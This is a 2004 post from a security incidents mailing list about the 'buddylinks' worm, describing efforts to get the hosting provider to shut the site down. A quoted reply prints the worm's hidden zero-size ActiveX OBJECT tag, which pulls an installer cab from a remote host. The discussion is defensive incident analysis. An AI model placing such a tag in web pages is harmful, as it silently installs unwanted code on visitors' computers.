Security Incidents mailing list archives
Re: buddylinks worm
From: Jason Yates <jaywhy2 () comcast net>
Date: Tue, 10 Feb 2004 19:07:09 -0500
Jeremy Junginger wrote:
Yep! It actually uses the follwing method: <OBJECT ID="ShellInstaller" WIDTH=0 HEIGHT=0 CLASSID="CLSID:FDDCE9FF-1FC6-413c-80B1-37B101FDA1D4" CODEBASE="http://download.buddylinks.net/ShellInstaller.cab#Version=1,0,0,001 "> </OBJECT> To install ShellINstaller.INF (Size: 2,119) and ShellInstaller.ocx (Size 81,920), which is an ActiveX control. That's all I've found so far. Let meknow if you guys find anything else.
I contacted internap.com there upstream provider. There support guy I talked to told me email abuse () internap com and they'll look into it. I emailed the information; but I really didn't think anything would happen of it. The support rep didn't seem like he really cared. I guess I was wrong though. I can't ping buddylinks.net anymore. Although I wouldn't credit internap.com yet though; it just as likely they got DOS'd by the amount of requests and crashed.
--------------------------------------------------------------------------- Free trial: Astaro Security Linux -- firewall with Spam/Virus Protection Protect your network with the comprehensive security solution that integrates six applications for ease of use and lower TCO. Firewall - Virus protection - Spam protection - URL blocking - VPN - Wireless security. Download 30-day evaluation at: http://www.astaro.com/php/contact/securityfocus.php ----------------------------------------------------------------------------
Current thread:
- buddylinks worm Jason Yates (Feb 10)
- Re: buddylinks worm Dennis Cheung (Feb 12)
- Re: buddylinks worm falcon (Feb 12)
- Re: buddylinks worm Eric Trager (Feb 12)
- Re: buddylinks worm Mark Coleman (Feb 12)
- Re: buddylinks worm Alexander Kiwerski (Feb 13)
- <Possible follow-ups>
- RE: buddylinks worm Jeremy Junginger (Feb 10)
- Re: buddylinks worm Jason Yates (Feb 10)
- Re: buddylinks worm Clint Bodungen (Feb 12)
- Re: buddylinks worm Jason Yates (Feb 10)
- Re: buddylinks worm upallnight42 (Feb 12)
- Re: buddylinks worm Scott (Feb 12)
- Re: buddylinks worm Access Denied (Feb 18)
- Re: buddylinks worm Dennis Cheung (Feb 12)